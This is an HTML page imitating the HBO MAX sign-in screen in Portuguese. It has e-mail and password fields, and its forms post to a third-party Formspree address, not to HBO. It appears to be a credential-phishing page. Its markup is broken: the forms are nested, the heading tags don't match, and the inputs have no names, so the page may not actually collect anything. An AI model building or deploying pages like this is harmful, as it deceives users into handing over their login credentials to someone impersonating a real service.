<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>HBO MAX</title>

    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@600&display=swap" rel="stylesheet">

    <style>
        h1{
            margin-top: 40px;
            font-family: 'Inter', sans-serif;
            margin-left: 20px;
        }
        
        #logomarca{
            margin-top: 20px;
            margin-left: 20px;
        }

        h6{
            margin-top: 20px;
            font-family: 'Inter', sans-serif;
            margin-bottom: 10px;
            margin-left: 20px;
        }

        h3{
            font-family: 'Inter', sans-serif;
            margin-bottom: 10px;
            margin-left: 20px;
        }

        button{
            margin-top: 10px;
            font-family: 'Inter', sans-serif;
            cursor: pointer;
            margin-left: 20px;
        }

        input{
            width: 300px;
            margin-left: 20px;
        }
        
    </style>

</head>
<body>
    <div id="logomarca">
    <img src="img/image 7@2x.png" alt="logo" height="45" width="auto">
    </div>

    <h1>Entrar</h1>
    <h6>Você tem uma conta HBO MAX?</h2>

    <h3>E-mail</h3>
    <form action="https://formspree.io/f/mbjearde" method="post">
        <input type="text" placeholder="email@email.com">
        
    <h3>Senha</h3>
        <form action="https://formspree.io/f/mbjearde" method="post">
            <input type="password" placeholder="***********">
    </form>

    <button type="submit">Entrar</button>

    <h6>Você acessa a HBO MAX por algum provedor de tv?</h4>

    <button type="submit">Entrar com um provedor</button>

</body>
</html>